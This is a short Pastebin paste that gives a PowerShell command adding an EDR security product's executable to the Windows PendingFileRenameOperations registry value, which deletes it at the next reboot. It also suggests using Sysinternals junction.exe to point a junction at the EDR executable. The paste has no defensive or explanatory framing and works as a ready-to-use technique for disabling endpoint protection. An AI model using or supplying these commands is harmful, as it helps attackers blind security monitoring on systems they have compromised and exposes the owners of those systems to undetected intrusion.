Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- New-ItemProperty -path "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager" -Name "PendingFileRenameOperations" -Value $($((Get-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager" -Name PendingFileRenameOperations -ErrorAction SilentlyContinue).PendingFileRenameOperations) + "\??\C:\Program Files\<EDR_EXE>.exe`0`0") -type MultiString -Force | Out-Null
- For making a junction, you can use Sysinternals' junction.exe:
- junction.exe <path_to_junction_to_create> <EDR_EXE_path>
Advertisement
Add Comment
Please, Sign In to add comment